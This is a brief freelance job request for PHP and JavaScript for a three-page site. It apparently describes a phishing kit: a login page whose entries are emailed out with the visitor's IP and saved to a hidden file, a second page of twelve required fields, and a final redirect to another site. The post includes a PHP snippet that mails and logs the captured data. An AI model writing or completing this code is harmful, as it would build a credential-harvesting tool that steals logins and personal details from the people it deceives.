Write PHP and JAVA scripts for 2 pages

Very simple project but i need it fast, in hours i mean I have 2 pages, all i need is to write PHP and java scripts for this page first page is very simple just login and password (info will be sent to email and saved as database) like this $send="mail at [login to view URL]"; $subject = "TEST | $ip"; mail($send,$subject,$message); $f = fopen("../.[login to view URL]", "a"); fwrite($f, $message.PHP_EOL); then agent will be transferred to page 2. Page 2 have 12 labels, i want the same as page 1. and agent will be transferred to page 3 and page 3 you have to do 1 thing with it (just small php script to redirect agent to another site) nothing else well all the labels will be required, agent can't go to next page until he fill out (correctly all the fields) and here is the java script job by the way i will need to costume some labels, like the first label will accept numbers only etc,
